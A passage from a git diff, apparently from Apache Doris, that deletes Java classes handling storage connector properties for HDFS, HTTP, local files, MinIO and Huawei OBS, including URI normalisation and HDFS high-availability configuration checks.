"simple"; - - @ConnectorProperty(names = {"hdfs.authentication.kerberos.principal", "hadoop.kerberos.principal"}, - required = false, - description = "The principal of the kerberos authentication.") - private String hdfsKerberosPrincipal = ""; - - @ConnectorProperty(names = {"hdfs.authentication.kerberos.keytab", "hadoop.kerberos.keytab"}, - required = false, - description = "The keytab of the kerberos authentication.") - private String hdfsKerberosKeytab = ""; - - @ConnectorProperty(names = {"hadoop.username"}, - required = false, - description = "The username of Hadoop. Doris will user this user to access HDFS") - private String hadoopUsername = ""; - - @ConnectorProperty(names = {"hdfs.impersonation.enabled"}, - required = false, - supported = false, - description = "Whether to enable the impersonation of HDFS.") - private boolean hdfsImpersonationEnabled = false; - - @ConnectorProperty(names = {"ipc.client.fallback-to-simple-auth-allowed"}, - required = false, - description = "Whether to allow fallback to simple authentication.") - private String allowFallbackToSimpleAuth = ""; - - - @ConnectorProperty(names = {"fs.defaultFS"}, required = false, description = "") - protected String fsDefaultFS = ""; - - @ConnectorProperty(names = {"hadoop.config.resources"}, - required = false, - description = "The xml files of Hadoop configuration.") - protected String hadoopConfigResources = ""; - - private String dfsNameServices; - - /** - * Whether this HDFS storage is explicitly configured by user. - * If false, this instance is auto-created by framework as a fallback storage, - * and should skip connectivity test. - */ - @Getter - private final boolean explicitlyConfigured; - - private static final String DFS_NAME_SERVICES_KEY = "dfs.nameservices"; - - private static final Set supportSchema = ImmutableSet.of("hdfs", "viewfs", "jfs"); - - /** - * The final HDFS configuration map that determines the effective settings. - * Priority rules: - * 1. If a key exists in `overrideConfig` (user-provided settings), its value takes precedence. - * 2. If a key is not present in `overrideConfig`, the value from `hdfs-site.xml` or `core-site.xml` is used. - * 3. This map should be used to read the resolved HDFS configuration, ensuring the correct precedence is applied. - */ - private Map userOverriddenHdfsConfig; - - private static final List HDFS_PROPERTIES_KEYS = Arrays.asList("hdfs.authentication.type", - "hadoop.security.authentication", "hadoop.username", "fs.defaultFS", - "hdfs.authentication.kerberos.principal", "hadoop.kerberos.principal", DFS_NAME_SERVICES_KEY, - "hdfs.config.resources"); - - public HdfsProperties(Map origProps) { - this(origProps, true); - } - - public HdfsProperties(Map origProps, boolean explicitlyConfigured) { - super(Type.HDFS, origProps); - this.explicitlyConfigured = explicitlyConfigured; - } - - public static boolean guessIsMe(Map props) { - if (MapUtils.isEmpty(props)) { - return false; - } - if (HdfsPropertiesUtils.validateUriIsHdfsUri(props, supportSchema)) { - return true; - } - return HDFS_PROPERTIES_KEYS.stream().anyMatch(props::containsKey); - } - - @Override - public void initNormalizeAndCheckProps() { - super.initNormalizeAndCheckProps(); - if (StringUtils.isBlank(fsDefaultFS)) { - this.fsDefaultFS = HdfsPropertiesUtils.extractDefaultFsFromUri(origProps, supportSchema); - } - extractUserOverriddenHdfsConfig(origProps); - initBackendConfigProperties(); - this.hadoopConfigMap = new LinkedHashMap<>(); - this.backendConfigProperties.forEach(hadoopConfigMap::put); - HdfsPropertiesUtils.checkHaConfig(backendConfigProperties); - } - - private void extractUserOverriddenHdfsConfig(Map origProps) { - if (MapUtils.isEmpty(origProps)) { - return; - } - userOverriddenHdfsConfig = new HashMap<>(); - origProps.forEach((key, value) -> { - if (key.startsWith("hadoop.") || key.startsWith("dfs.") || key.startsWith("fs.") - || key.startsWith("juicefs.")) { - userOverriddenHdfsConfig.put(key, value); - } - }); - - } - - protected void checkRequiredProperties() { - super.checkRequiredProperties(); - if ("kerberos".equalsIgnoreCase(hdfsAuthenticationType) && (Strings.isNullOrEmpty(hdfsKerberosPrincipal) - || Strings.isNullOrEmpty(hdfsKerberosKeytab))) { - throw new IllegalArgumentException("HDFS authentication type is kerberos, " - + "but principal or keytab is not set."); - } - } - - private void initBackendConfigProperties() { - Map props = loadConfigFromFile(hadoopConfigResources); - if (MapUtils.isNotEmpty(userOverriddenHdfsConfig)) { - props.putAll(userOverriddenHdfsConfig); - } - if (StringUtils.isNotBlank(fsDefaultFS)) { - props.put(HDFS_DEFAULT_FS_NAME, fsDefaultFS); - } - if (StringUtils.isNotBlank(allowFallbackToSimpleAuth)) { - props.put("ipc.client.fallback-to-simple-auth-allowed", allowFallbackToSimpleAuth); - } else { - props.put("ipc.client.fallback-to-simple-auth-allowed", "true"); - } - props.put("hdfs.security.authentication", hdfsAuthenticationType); - if ("kerberos".equalsIgnoreCase(hdfsAuthenticationType)) { - props.put("hadoop.security.authentication", "kerberos"); - props.put("hadoop.kerberos.principal", hdfsKerberosPrincipal); - props.put("hadoop.kerberos.keytab", hdfsKerberosKeytab); - } - if (StringUtils.isNotBlank(hadoopUsername)) { - props.put("hadoop.username", hadoopUsername); - } - this.dfsNameServices = props.getOrDefault(DFS_NAME_SERVICES_KEY, ""); - if (StringUtils.isBlank(fsDefaultFS)) { - this.fsDefaultFS = props.getOrDefault(HDFS_DEFAULT_FS_NAME, ""); - } - this.backendConfigProperties = props; - } - - public boolean isKerberos() { - return "kerberos".equalsIgnoreCase(hdfsAuthenticationType); - } - - //fixme be should send use input params - @Override - public Map getBackendConfigProperties() { - return backendConfigProperties; - } - - @Override - public String validateAndNormalizeUri(String url) throws StoragePropertiesException { - return HdfsPropertiesUtils.convertUrlToFilePath(url, this.dfsNameServices, this.fsDefaultFS, supportSchema); - - } - - @Override - public String validateAndGetUri(Map loadProps) throws StoragePropertiesException { - return HdfsPropertiesUtils.validateAndGetUri(loadProps, this.dfsNameServices, this.fsDefaultFS, supportSchema); - } - - @Override - public String getStorageName() { - return "HDFS"; - } - - public String getDefaultFS() { - return fsDefaultFS; - } -} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/HdfsPropertiesUtils.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/HdfsPropertiesUtils.java deleted file mode 100644 index d1ec94510e4a66..00000000000000 --- a/fe/fe-property/src/main/java/org/apache/doris/property/storage/HdfsPropertiesUtils.java +++ /dev/null @@ -1,275 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.property.storage; - -import org.apache.doris.foundation.property.StoragePropertiesException; - -import com.google.common.base.Strings; -import org.apache.commons.lang3.StringUtils; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -import java.io.UnsupportedEncodingException; -import java.net.URI; -import java.net.URISyntaxException; -import java.net.URLDecoder; -import java.net.URLEncoder; -import java.nio.charset.StandardCharsets; -import java.util.Arrays; -import java.util.Collections; -import java.util.List; -import java.util.Map; -import java.util.Set; -import java.util.stream.Collectors; - -public class HdfsPropertiesUtils { - private static final Logger LOG = LogManager.getLogger(HdfsPropertiesUtils.class); - private static final String URI_KEY = "uri"; - private static final String STANDARD_HDFS_PREFIX = "hdfs://"; - private static final String EMPTY_HDFS_PREFIX = "hdfs:///"; - private static final String BROKEN_HDFS_PREFIX = "hdfs:/"; - private static final String SCHEME_DELIM = "://"; - private static final String NONSTANDARD_SCHEME_DELIM = ":/"; - - // Inlined from org.apache.hadoop.hdfs.client.HdfsClientConfigKeys (hadoop-hdfs-client) to keep fe-property free - // of a hadoop-hdfs dependency. These are stable, well-known HDFS HA configuration keys. - private static final String DFS_NAMESERVICES = "dfs.nameservices"; - private static final String DFS_HA_NAMENODES_KEY_PREFIX = "dfs.ha.namenodes"; - private static final String DFS_NAMENODE_RPC_ADDRESS_KEY = "dfs.namenode.rpc-address"; - private static final String DFS_HA_FAILOVER_PROXY_PROVIDER_KEY_PREFIX = "dfs.client.failover.proxy.provider"; - - public static String validateAndGetUri(Map props, String host, String defaultFs, - Set supportSchemas) throws StoragePropertiesException { - if (props.isEmpty()) { - throw new StoragePropertiesException("props is empty"); - } - String uriStr = getUri(props); - if (StringUtils.isBlank(uriStr)) { - throw new StoragePropertiesException("props must contain uri"); - } - return validateAndNormalizeUri(uriStr, host, defaultFs, supportSchemas); - } - - public static boolean validateUriIsHdfsUri(Map props, - Set supportSchemas) { - String uriStr = getUri(props); - if (StringUtils.isBlank(uriStr)) { - return false; - } - URI uri; - try { - uri = URI.create(uriStr); - } catch (Exception ex) { - // The glob syntax of s3 contains {, which will cause an error here. - LOG.warn("Failed to validate uri is hdfs uri, {}", ex.getMessage()); - return false; - } - String schema = uri.getScheme(); - if (StringUtils.isBlank(schema)) { - throw new IllegalArgumentException("Invalid uri: " + uriStr + ", extract schema is null"); - } - return isSupportedSchema(schema, supportSchemas); - } - - public static String extractDefaultFsFromPath(String filePath) { - if (StringUtils.isBlank(filePath)) { - return null; - } - URI uri = URI.create(filePath); - return uri.getScheme() + "://" + uri.getAuthority(); - } - - public static String extractDefaultFsFromUri(Map props, Set supportSchemas) { - String uriStr = getUri(props); - if (StringUtils.isBlank(uriStr)) { - return null; - } - URI uri = URI.create(uriStr); - if (!isSupportedSchema(uri.getScheme(), supportSchemas)) { - return null; - } - return uri.getScheme() + "://" + uri.getAuthority(); - } - - public static String convertUrlToFilePath(String uriStr, String host, - String defaultFs, Set supportSchemas) { - return validateAndNormalizeUri(uriStr, host, defaultFs, supportSchemas); - } - - public static String convertUrlToFilePath(String uriStr, String host, Set supportSchemas) { - return validateAndNormalizeUri(uriStr, host, null, supportSchemas); - } - - /* - * Extracts the URI value from the given properties. - * If multiple URIs are specified (separated by commas), this method returns null. - * Note: Some storage systems may support multiple URIs (e.g., for load balancing or multi-host), - * but in the HDFS scenario, fs.defaultFS only supports a single URI. - * Therefore, such a format is considered invalid for HDFS. so, just return null. - */ - private static String getUri(Map props) { - String uriValue = props.entrySet().stream() - .filter(e -> e.getKey().equalsIgnoreCase(URI_KEY)) - .map(Map.Entry::getValue) - .filter(StringUtils::isNotBlank) - .findFirst() - .orElse(null); - if (uriValue == null) { - return null; - } - String[] uris = uriValue.split(","); - if (uris.length > 1) { - return null; - } - return uriValue; - } - - private static boolean isSupportedSchema(String schema, Set supportSchema) { - return schema != null && supportSchema.contains(schema.toLowerCase()); - } - - public static String validateAndNormalizeUri(String location, Set supportedSchemas) { - return validateAndNormalizeUri(location, null, null, supportedSchemas); - } - - public static String validateAndNormalizeUri(String location, String host, String defaultFs, - Set supportedSchemas) { - if (StringUtils.isBlank(location)) { - throw new IllegalArgumentException("Property 'uri' is required."); - } - if (!(location.contains(SCHEME_DELIM) || location.contains(NONSTANDARD_SCHEME_DELIM)) - && StringUtils.isNotBlank(defaultFs)) { - location = defaultFs + location; - } - try { - // Encode the location string, but keep '/' and ':' unescaped to preserve URI structure - String newLocation = URLEncoder.encode(location, StandardCharsets.UTF_8.name()) - .replace("%2F", "/") - .replace("%3A", ":"); - - URI uri = new URI(newLocation).normalize(); - - boolean isSupportedSchema = isSupportedSchema(uri.getScheme(), supportedSchemas); - if (!isSupportedSchema) { - throw new IllegalArgumentException("Unsupported schema: " + uri.getScheme()); - } - // compatible with 'hdfs:///' or 'hdfs:/' - if (StringUtils.isEmpty(uri.getHost())) { - newLocation = URLDecoder.decode(newLocation, StandardCharsets.UTF_8.name()); - if (newLocation.startsWith(BROKEN_HDFS_PREFIX) && !newLocation.startsWith(STANDARD_HDFS_PREFIX)) { - newLocation = newLocation.replace(BROKEN_HDFS_PREFIX, STANDARD_HDFS_PREFIX); - } - if (StringUtils.isNotEmpty(host)) { - // Replace 'hdfs://key/' to 'hdfs://name_service/key/' - // Or hdfs:///abc to hdfs://name_service/abc - if (newLocation.startsWith(EMPTY_HDFS_PREFIX)) { - return newLocation.replace(STANDARD_HDFS_PREFIX, STANDARD_HDFS_PREFIX + host); - } else { - return newLocation.replace(STANDARD_HDFS_PREFIX, STANDARD_HDFS_PREFIX + host + "/"); - } - } else { - // 'hdfs://null/' equals the 'hdfs:///' - if (newLocation.startsWith(EMPTY_HDFS_PREFIX)) { - // Do not support hdfs:///location - throw new RuntimeException("Invalid location with empty host: " + newLocation); - } else { - // Replace 'hdfs://key/' to '/key/', try access local NameNode on BE. - return newLocation.replace(STANDARD_HDFS_PREFIX, "/"); - } - } - } - // Normal case: decode and return the fully-qualified URI - return URLDecoder.decode(newLocation, StandardCharsets.UTF_8.name()); - - } catch (URISyntaxException | UnsupportedEncodingException e) { - throw new StoragePropertiesException("Failed to parse URI: " + location, e); - } - } - - /** - * Validate the required HDFS HA configuration properties. - * - *

      This method checks the following: - *

        - *
      • {@code dfs.nameservices} must be defined if HA is enabled.
      • - *
      • {@code dfs.ha.namenodes.} must be defined and contain at least 2 namenodes.
      • - *
      • For each namenode, {@code dfs.namenode.rpc-address..} must be defined.
      • - *
      • {@code dfs.client.failover.proxy.provider.} must be defined.
      • - *
      - * - * @param hdfsProperties configuration map (similar to core-site.xml/hdfs-site.xml properties) - */ - public static void checkHaConfig(Map hdfsProperties) { - if (hdfsProperties == null) { - return; - } - // 1. Check dfs.nameservices - String dfsNameservices = hdfsProperties.getOrDefault(DFS_NAMESERVICES, ""); - if (Strings.isNullOrEmpty(dfsNameservices)) { - // No nameservice configured => HA is not enabled, nothing to validate - return; - } - for (String dfsservice : splitAndTrim(dfsNameservices)) { - if (dfsservice.isEmpty()) { - continue; - } - // 2. Check dfs.ha.namenodes. - String haNnKey = DFS_HA_NAMENODES_KEY_PREFIX + "." + dfsservice; - String namenodes = hdfsProperties.getOrDefault(haNnKey, ""); - if (Strings.isNullOrEmpty(namenodes)) { - throw new IllegalArgumentException("Missing property: " + haNnKey); - } - List names = splitAndTrim(namenodes); - if (names.size() < 2) { - throw new IllegalArgumentException("HA requires at least 2 namenodes for service: " + dfsservice); - } - // 3. Check dfs.namenode.rpc-address.. - for (String name : names) { - String rpcKey = DFS_NAMENODE_RPC_ADDRESS_KEY + "." + dfsservice + "." + name; - String address = hdfsProperties.getOrDefault(rpcKey, ""); - if (Strings.isNullOrEmpty(address)) { - throw new IllegalArgumentException("Missing property: " + rpcKey + " (expected format: host:port)"); - } - } - // 4. Check dfs.client.failover.proxy.provider. - String failoverKey = DFS_HA_FAILOVER_PROXY_PROVIDER_KEY_PREFIX + "." + dfsservice; - String failoverProvider = hdfsProperties.getOrDefault(failoverKey, ""); - if (Strings.isNullOrEmpty(failoverProvider)) { - throw new IllegalArgumentException("Missing property: " + failoverKey); - } - } - } - - /** - * Utility method to split a comma-separated string, trim whitespace, - * and remove empty tokens. - * - * @param s the input string - * @return list of trimmed non-empty values - */ - private static List splitAndTrim(String s) { - if (Strings.isNullOrEmpty(s)) { - return Collections.emptyList(); - } - return Arrays.stream(s.split(",")) - .map(String::trim) - .filter(tok -> !tok.isEmpty()) - .collect(Collectors.toList()); - } -} - diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/HttpProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/HttpProperties.java deleted file mode 100644 index 7da6f5007571f4..00000000000000 --- a/fe/fe-property/src/main/java/org/apache/doris/property/storage/HttpProperties.java +++ /dev/null @@ -1,92 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.property.storage; - -import org.apache.doris.foundation.property.StoragePropertiesException; - -import com.google.common.collect.ImmutableSet; -import com.google.common.collect.Maps; -import org.apache.commons.collections4.MapUtils; - -import java.util.Map; -import java.util.Set; - -public class HttpProperties extends StorageProperties { - private static final ImmutableSet HTTP_PROPERTIES = new ImmutableSet.Builder() - .add(StorageProperties.FS_HTTP_SUPPORT) - .build(); - - public HttpProperties(Map origProps) { - super(Type.HTTP, origProps); - } - - @Override - public Map getBackendConfigProperties() { - return origProps; - } - - @Override - public String validateAndNormalizeUri(String url) throws StoragePropertiesException { - if (url == null || (!url.startsWith("http://") && !url.startsWith("https://") && !url.startsWith("hf://"))) { - throw new StoragePropertiesException("Invalid http/hf url: " + url); - } - return url; - } - - @Override - public String validateAndGetUri(Map props) throws StoragePropertiesException { - String url = props.get(URI_KEY); - return validateAndNormalizeUri(url); - } - - public static boolean guessIsMe(Map props) { - return !MapUtils.isEmpty(props) - && HTTP_PROPERTIES.stream().anyMatch(props::containsKey); - } - - public String getUri() { - return origProps.get(URI_KEY); - } - - @Override - public String getStorageName() { - return "http"; - } - - @Override - public void initializeHadoopStorageConfig() { - // not used - hadoopConfigMap = null; - } - - @Override - protected Set schemas() { - return ImmutableSet.of("http"); - } - - public Map getHeaders() { - Map headers = Maps.newHashMap(); - for (Map.Entry entry : origProps.entrySet()) { - if (entry.getKey().toLowerCase().startsWith("http.header.")) { - String headerKey = entry.getKey().substring("http.header.".length()); - headers.put(headerKey, entry.getValue()); - } - } - return headers; - } -} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/LocalProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/LocalProperties.java deleted file mode 100644 index d43879389abe0d..00000000000000 --- a/fe/fe-property/src/main/java/org/apache/doris/property/storage/LocalProperties.java +++ /dev/null @@ -1,89 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.property.storage; - -import org.apache.doris.foundation.property.StoragePropertiesException; - -import com.google.common.collect.ImmutableSet; -import org.apache.commons.collections4.MapUtils; - -import java.util.LinkedHashMap; -import java.util.Map; -import java.util.Set; - -public class LocalProperties extends StorageProperties { - public static final String PROP_FILE_PATH = "file_path"; - - // This backend is user specified backend for listing files, fetching file schema and executing query. - private long backendId; - // This backend if for listing files and fetching file schema. - // If "backendId" is set, "backendIdForRequest" will be set to "backendId", - // otherwise, "backendIdForRequest" will be set to one of the available backends. - private long backendIdForRequest = -1; - private boolean sharedStorage = false; - - private static final ImmutableSet LOCATION_PROPERTIES = new ImmutableSet.Builder() - .add(PROP_FILE_PATH) - .build(); - - public LocalProperties(Map origProps) { - super(Type.LOCAL, origProps); - } - - public static boolean guessIsMe(Map props) { - if (MapUtils.isEmpty(props)) { - return false; - } - if (LOCATION_PROPERTIES.stream().anyMatch(props::containsKey)) { - return true; - } - return false; - } - - @Override - public Map getBackendConfigProperties() { - return origProps; - } - - @Override - public String validateAndNormalizeUri(String url) throws StoragePropertiesException { - return url; - } - - @Override - public String validateAndGetUri(Map loadProps) throws StoragePropertiesException { - return loadProps.get(PROP_FILE_PATH); - } - - @Override - public String getStorageName() { - return "local"; - } - - @Override - public void initializeHadoopStorageConfig() { - hadoopConfigMap = new LinkedHashMap<>(); - hadoopConfigMap.put("fs.local.impl", "org.apache.hadoop.fs.LocalFileSystem"); - hadoopConfigMap.put("fs.file.impl", "org.apache.hadoop.fs.LocalFileSystem"); - } - - @Override - protected Set schemas() { - return ImmutableSet.of(); - } -} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/MinioProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/MinioProperties.java deleted file mode 100644 index ff6db6f7d00550..00000000000000 --- a/fe/fe-property/src/main/java/org/apache/doris/property/storage/MinioProperties.java +++ /dev/null @@ -1,143 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.property.storage; - -import org.apache.doris.foundation.property.ConnectorProperty; - -import com.google.common.collect.ImmutableSet; -import lombok.Getter; -import lombok.Setter; - -import java.util.Map; -import java.util.Set; -import java.util.regex.Pattern; - -public class MinioProperties extends AbstractS3CompatibleProperties { - @Setter - @Getter - @ConnectorProperty(names = {"minio.endpoint", "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT"}, - required = false, description = "The endpoint of Minio.") - protected String endpoint = ""; - @Getter - @Setter - @ConnectorProperty(names = {"minio.region", "s3.region", "AWS_REGION", "region", "REGION"}, - required = false, - isRegionField = true, - description = "The region of MinIO.") - protected String region = "us-east-1"; - - @Getter - @ConnectorProperty(names = {"minio.access_key", "s3.access-key-id", "AWS_ACCESS_KEY", "ACCESS_KEY", - "access_key", "s3.access_key"}, - required = false, - sensitive = true, - description = "The access key of Minio.") - protected String accessKey = ""; - - @Getter - @ConnectorProperty(names = {"minio.secret_key", "s3.secret-access-key", "s3.secret_key", "AWS_SECRET_KEY", - "secret_key", "SECRET_KEY"}, - required = false, - sensitive = true, - description = "The secret key of Minio.") - protected String secretKey = ""; - - @Getter - @ConnectorProperty(names = {"minio.session_token", "s3.session-token", "s3.session_token", "session_token"}, - required = false, - sensitive = true, - description = "The session token of Minio.") - protected String sessionToken = ""; - - /** - * The maximum number of concurrent connections that can be made to the object storage system. - * This value is optional and can be configured by the user. - */ - @Getter - @ConnectorProperty(names = {"minio.connection.maximum", "s3.connection.maximum"}, required = false, - description = "Maximum number of connections.") - protected String maxConnections = "100"; - - /** - * The timeout (in milliseconds) for requests made to the object storage system. - * This value is optional and can be configured by the user. - */ - @Getter - @ConnectorProperty(names = {"minio.connection.request.timeout", "s3.connection.request.timeout"}, required = false, - description = "Request timeout in seconds.") - protected String requestTimeoutS = "10000"; - - /** - * The timeout (in milliseconds) for establishing a connection to the object storage system. - * This value is optional and can be configured by the user. - */ - @Getter - @ConnectorProperty(names = {"minio.connection.timeout", "s3.connection.timeout"}, required = false, - description = "Connection timeout in seconds.") - protected String connectionTimeoutS = "10000"; - - /** - * Flag indicating whether to use path-style URLs for the object storage system. - * This value is optional and can be configured by the user. - */ - @Setter - @Getter - @ConnectorProperty(names = {"minio.use_path_style", "use_path_style", "s3.path-style-access"}, required = false, - description = "Whether to use path style URL for the storage.") - protected String usePathStyle = "false"; - - @ConnectorProperty(names = {"minio.force_parsing_by_standard_uri", "force_parsing_by_standard_uri"}, - required = false, - description = "Whether to use path style URL for the storage.") - @Setter - @Getter - protected String forceParsingByStandardUrl = "false"; - - private static final Set IDENTIFIERS = ImmutableSet.of("minio.access_key", "AWS_ACCESS_KEY", "ACCESS_KEY", - "access_key", "s3.access_key", "minio.endpoint", "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT"); - - /** - * Constructor to initialize the object storage properties with the provided type and original properties map. - * - * @param origProps the original properties map. - */ - protected MinioProperties(Map origProps) { - super(Type.MINIO, origProps); - } - - public static boolean guessIsMe(Map origProps) { - //ugly, but we need to check if the user has set any of the identifiers - if (AzureProperties.guessIsMe(origProps) || COSProperties.guessIsMe(origProps) - || OSSProperties.guessIsMe(origProps) || S3Properties.guessIsMe(origProps)) { - return false; - } - - return IDENTIFIERS.stream().map(origProps::get).anyMatch(value -> value != null && !value.isEmpty()); - } - - - @Override - protected Set endpointPatterns() { - return ImmutableSet.of(Pattern.compile("^(?:https?://)?[a-zA-Z0-9.-]+(?::\\d+)?$")); - } - - @Override - protected Set schemas() { - return ImmutableSet.of("s3"); - } -} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/OBSProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/OBSProperties.java deleted file mode 100644 index 9d6a39ffcfe31d..00000000000000 --- a/fe/fe-property/src/main/java/org/apache/doris/property/storage/OBSProperties.java +++ /dev/null @@ -1,204 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.property.storage; - -import org.apache.doris.foundation.property.ConnectorPropertiesUtils; -import org.apache.doris.foundation.property.ConnectorProperty; - -import com.google.common.base.Strings; -import com.google.common.collect.ImmutableSet; -import lombok.Getter; -import lombok.Setter; -import org.apache.commons.lang3.StringUtils; - -import java.util.Map; -import java.util.Objects; -import java.util.Optional; -import java.util.Set; -import java.util.regex.Pattern; -import java.util.stream.Stream; - -public class OBSProperties extends AbstractS3CompatibleProperties { - - @Setter - @Getter - @ConnectorProperty(names = {"obs.endpoint", "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT"}, - required = false, - description = "The endpoint of OBS.") - protected String endpoint = ""; - - @Getter - @ConnectorProperty(names = {"obs.access_key", "s3.access_key", "s3.access-key-id", "AWS_ACCESS_KEY", - "access_key", "ACCESS_KEY"}, - required = false, - sensitive = true, - description = "The access key of OBS.") - protected String accessKey = ""; - - @Getter - @ConnectorProperty(names = {"obs.secret_key", "s3.secret_key", "s3.secret-access-key", "AWS_SECRET_KEY", - "secret_key", "SECRET_KEY"}, - required = false, - sensitive = true, - description = "The secret key of OBS.") - protected String secretKey = ""; - - @Getter - @Setter - @ConnectorProperty(names = {"obs.region", "s3.region", "AWS_REGION", "region", "REGION"}, required = false, - isRegionField = true, - description = "The region of OBS.") - protected String region; - - @Getter - @ConnectorProperty(names = {"obs.session_token", "s3.session_token", "s3.session-token", "session_token"}, - required = false, - description = "The session token of OBS.") - protected String sessionToken = ""; - - /** - * The maximum number of concurrent connections that can be made to the object storage system. - * This value is optional and can be configured by the user. - */ - @Getter - @ConnectorProperty(names = {"obs.connection.maximum", "s3.connection.maximum"}, required = false, - description = "Maximum number of connections.") - protected String maxConnections = "100"; - - /** - * The timeout (in milliseconds) for requests made to the object storage system. - * This value is optional and can be configured by the user. - */ - @Getter - @ConnectorProperty(names = {"obs.connection.request.timeout", "s3.connection.request.timeout"}, required = false, - description = "Request timeout in seconds.") - protected String requestTimeoutS = "10000"; - - /** - * The timeout (in milliseconds) for establishing a connection to the object storage system. - * This value is optional and can be configured by the user. - */ - @Getter - @ConnectorProperty(names = {"obs.connection.timeout", "s3.connection.timeout"}, required = false, - description = "Connection timeout in seconds.") - protected String connectionTimeoutS = "10000"; - - /** - * Flag indicating whether to use path-style URLs for the object storage system. - * This value is optional and can be configured by the user. - */ - @Setter - @Getter - @ConnectorProperty(names = {"obs.use_path_style", "use_path_style", "s3.path-style-access"}, required = false, - description = "Whether to use path style URL for the storage.") - protected String usePathStyle = "false"; - - @ConnectorProperty(names = {"obs.force_parsing_by_standard_uri", "force_parsing_by_standard_uri"}, required = false, - description = "Whether to use path style URL for the storage.") - @Setter - @Getter - protected String forceParsingByStandardUrl = "false"; - - /** - * Pattern to extract the region from a Huawei Cloud OBS endpoint. - *

      - * Supported formats: - * - obs-cn-hangzhou.myhuaweicloud.com => region = cn-hangzhou - * - https://obs-cn-shanghai.myhuaweicloud.com => region = cn-shanghai - *

      - * Group(1) captures the region name (e.g., cn-hangzhou). - * FYI: https://console-intl.huaweicloud.com/apiexplorer/#/endpoint/OBS - */ - private static final Set ENDPOINT_PATTERN = ImmutableSet.of(Pattern - .compile("^(?:https?://)?obs\\.([a-z0-9-]+)\\.myhuaweicloud\\.com$")); - - - public OBSProperties(Map origProps) { - super(Type.OBS, origProps); - // Initialize fields from origProps - } - - public static OBSProperties of(Map properties) { - OBSProperties propertiesObj = new OBSProperties(properties); - ConnectorPropertiesUtils.bindConnectorProperties(propertiesObj, properties); - propertiesObj.initNormalizeAndCheckProps(); - propertiesObj.initializeHadoopStorageConfig(); - return propertiesObj; - } - - protected static boolean guessIsMe(Map origProps) { - String value = Stream.of("obs.endpoint", "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT") - .map(origProps::get) - .filter(Objects::nonNull) - .findFirst() - .orElse(null); - - if (!Strings.isNullOrEmpty(value)) { - return value.contains("myhuaweicloud.com"); - } - Optional uriValue = origProps.entrySet().stream() - .filter(e -> e.getKey().equalsIgnoreCase("uri")) - .map(Map.Entry::getValue) - .findFirst(); - return uriValue.isPresent() && uriValue.get().contains("myhuaweicloud.com"); - } - - @Override - protected Set endpointPatterns() { - return ENDPOINT_PATTERN; - } - - private static final boolean OBS_FILE_SYSTEM_AVAILABLE = - isClassAvailable("org.apache.hadoop.fs.obs.OBSFileSystem"); - - private static boolean isClassAvailable(String className) { - try { - Class.forName(className, false, OBSProperties.class.getClassLoader()); - return true; - } catch (ClassNotFoundException e) { - return false; - } - } - - @Override - public void initializeHadoopStorageConfig() { - super.initializeHadoopStorageConfig(); - // obs is not compatible 